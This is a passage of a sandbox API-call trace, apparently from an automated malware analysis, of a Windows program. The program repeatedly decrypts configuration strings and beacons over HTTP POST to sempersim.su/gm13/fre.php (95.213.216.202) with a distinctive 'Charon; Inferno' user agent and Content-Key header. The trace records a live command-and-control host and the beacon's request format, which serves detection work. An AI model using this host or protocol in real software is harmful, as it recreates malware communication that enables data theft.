out: hHeap=0x620000) returned 1 [0262.323] send (s=0x3ec, buf=0x63a880*, len=237, flags=0) returned 237 [0262.324] send (s=0x3ec, buf=0x6421e0*, len=159, flags=0) returned 159 [0262.324] GetProcessHeap () returned 0x620000 [0262.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0262.324] recv (in: s=0x3ec, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0263.913] GetProcessHeap () returned 0x620000 [0263.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0263.913] GetProcessHeap () returned 0x620000 [0263.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0263.913] GetProcessHeap () returned 0x620000 [0263.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0263.914] GetProcessHeap () returned 0x620000 [0263.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0263.914] closesocket (s=0x3ec) returned 0 [0263.915] GetProcessHeap () returned 0x620000 [0263.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0263.915] GetProcessHeap () returned 0x620000 [0263.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6451e0 | out: hHeap=0x620000) returned 1 [0263.915] GetProcessHeap () returned 0x620000 [0263.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0263.915] GetProcessHeap () returned 0x620000 [0263.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0263.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc10) returned 0x3ec [0263.917] Sleep (dwMilliseconds=0xea60) [0263.936] GetProcessHeap () returned 0x620000 [0263.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0263.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.937] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.944] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0263.954] GetProcessHeap () returned 0x620000 [0263.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0263.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.955] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0263.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.956] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.957] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.957] GetProcessHeap () returned 0x620000 [0263.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0263.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.958] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0263.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.959] CryptDestroyKey (hKey=0x62d710) returned 1 [0263.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.960] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0263.960] GetProcessHeap () returned 0x620000 [0263.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644d90 [0263.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.961] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.962] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.966] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.967] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.967] GetProcessHeap () returned 0x620000 [0263.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0263.967] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.967] GetProcessHeap () returned 0x620000 [0263.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0263.968] GetProcessHeap () returned 0x620000 [0263.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d90 | out: hHeap=0x620000) returned 1 [0263.968] GetProcessHeap () returned 0x620000 [0263.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0263.968] GetProcessHeap () returned 0x620000 [0263.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0263.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.969] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0263.986] GetProcessHeap () returned 0x620000 [0263.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0263.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.987] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0263.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.988] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.989] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.989] GetProcessHeap () returned 0x620000 [0263.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0263.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.991] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0263.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.992] CryptDestroyKey (hKey=0x62d710) returned 1 [0263.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0263.993] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0263.993] GetProcessHeap () returned 0x620000 [0263.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ed0 [0263.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.994] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0263.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.998] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0263.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.999] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0263.999] GetProcessHeap () returned 0x620000 [0263.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0263.999] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bee8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0264.001] GetProcessHeap () returned 0x620000 [0264.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b690 [0264.001] socket (af=2, type=1, protocol=6) returned 0x3f0 [0264.001] connect (s=0x3f0, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0264.055] FreeAddrInfoW (pAddrInfo=0x63bee8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0264.055] GetProcessHeap () returned 0x620000 [0264.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0264.055] GetProcessHeap () returned 0x620000 [0264.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0264.056] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0264.057] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0264.057] GetProcessHeap () returned 0x620000 [0264.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0264.057] GetProcessHeap () returned 0x620000 [0264.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0264.058] GetProcessHeap () returned 0x620000 [0264.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0264.058] GetProcessHeap () returned 0x620000 [0264.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0264.058] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0264.059] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0264.059] GetProcessHeap () returned 0x620000 [0264.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0264.059] GetProcessHeap () returned 0x620000 [0264.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0264.060] send (s=0x3f0, buf=0x63a880*, len=237, flags=0) returned 237 [0264.060] send (s=0x3f0, buf=0x6421e0*, len=159, flags=0) returned 159 [0264.061] GetProcessHeap () returned 0x620000 [0264.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0264.061] recv (in: s=0x3f0, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0265.806] GetProcessHeap () returned 0x620000 [0265.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0265.806] GetProcessHeap () returned 0x620000 [0265.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0265.807] GetProcessHeap () returned 0x620000 [0265.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0265.808] GetProcessHeap () returned 0x620000 [0265.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0265.808] closesocket (s=0x3f0) returned 0 [0265.809] GetProcessHeap () returned 0x620000 [0265.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b690 | out: hHeap=0x620000) returned 1 [0265.809] GetProcessHeap () returned 0x620000 [0265.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ed0 | out: hHeap=0x620000) returned 1 [0265.809] GetProcessHeap () returned 0x620000 [0265.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0265.810] GetProcessHeap () returned 0x620000 [0265.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0265.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc14) returned 0x3f0 [0265.812] Sleep (dwMilliseconds=0xea60) [0265.826] GetProcessHeap () returned 0x620000 [0265.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0265.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.834] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0265.873] GetProcessHeap () returned 0x620000 [0265.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0265.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.874] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0265.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.875] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.876] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.876] GetProcessHeap () returned 0x620000 [0265.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0265.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.878] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0265.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.879] CryptDestroyKey (hKey=0x62d710) returned 1 [0265.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.880] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0265.880] GetProcessHeap () returned 0x620000 [0265.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0265.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0265.881] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0265.882] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0265.883] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0265.884] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.884] GetProcessHeap () returned 0x620000 [0265.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0265.884] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.885] GetProcessHeap () returned 0x620000 [0265.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0265.981] GetProcessHeap () returned 0x620000 [0265.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0265.982] GetProcessHeap () returned 0x620000 [0265.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0265.982] GetProcessHeap () returned 0x620000 [0265.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6432d8 [0265.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.989] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0265.996] GetProcessHeap () returned 0x620000 [0265.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0265.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.997] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0265.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.998] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0265.999] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.999] GetProcessHeap () returned 0x620000 [0266.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0266.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0266.001] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6432d8, pdwDataLen=0x19fcfc | out: pbData=0x6432d8, pdwDataLen=0x19fcfc) returned 1 [0266.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0266.002] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0266.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0266.003] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0266.003] GetProcessHeap () returned 0x620000 [0266.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0266.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0266.004] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0266.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0266.005] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0266.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0266.006] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0266.006] GetProcessHeap () returned 0x620000 [0266.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0266.006] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c320*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0266.007] GetProcessHeap () returned 0x620000 [0266.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b560 [0266.007] socket (af=2, type=1, protocol=6) returned 0x3f4 [0266.007] connect (s=0x3f4, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0266.058] FreeAddrInfoW (pAddrInfo=0x63c320*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0266.058] GetProcessHeap () returned 0x620000 [0266.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0266.058] GetProcessHeap () returned 0x620000 [0266.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0266.059] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0266.060] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0266.060] GetProcessHeap () returned 0x620000 [0266.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0266.060] GetProcessHeap () returned 0x620000 [0266.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0266.060] GetProcessHeap () returned 0x620000 [0266.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642f78 [0266.060] GetProcessHeap () returned 0x620000 [0266.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0266.061] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0266.062] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0266.062] GetProcessHeap () returned 0x620000 [0266.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0266.062] GetProcessHeap () returned 0x620000 [0266.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0266.063] send (s=0x3f4, buf=0x63a880*, len=237, flags=0) returned 237 [0266.063] send (s=0x3f4, buf=0x6421e0*, len=159, flags=0) returned 159 [0266.063] GetProcessHeap () returned 0x620000 [0266.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0266.063] recv (in: s=0x3f4, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0267.843] GetProcessHeap () returned 0x620000 [0267.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0267.844] GetProcessHeap () returned 0x620000 [0267.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0267.845] GetProcessHeap () returned 0x620000 [0267.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0267.845] GetProcessHeap () returned 0x620000 [0267.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0267.845] closesocket (s=0x3f4) returned 0 [0267.846] GetProcessHeap () returned 0x620000 [0267.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b560 | out: hHeap=0x620000) returned 1 [0267.847] GetProcessHeap () returned 0x620000 [0267.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0267.847] GetProcessHeap () returned 0x620000 [0267.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6432d8 | out: hHeap=0x620000) returned 1 [0267.847] GetProcessHeap () returned 0x620000 [0267.848] HeapFree (in: 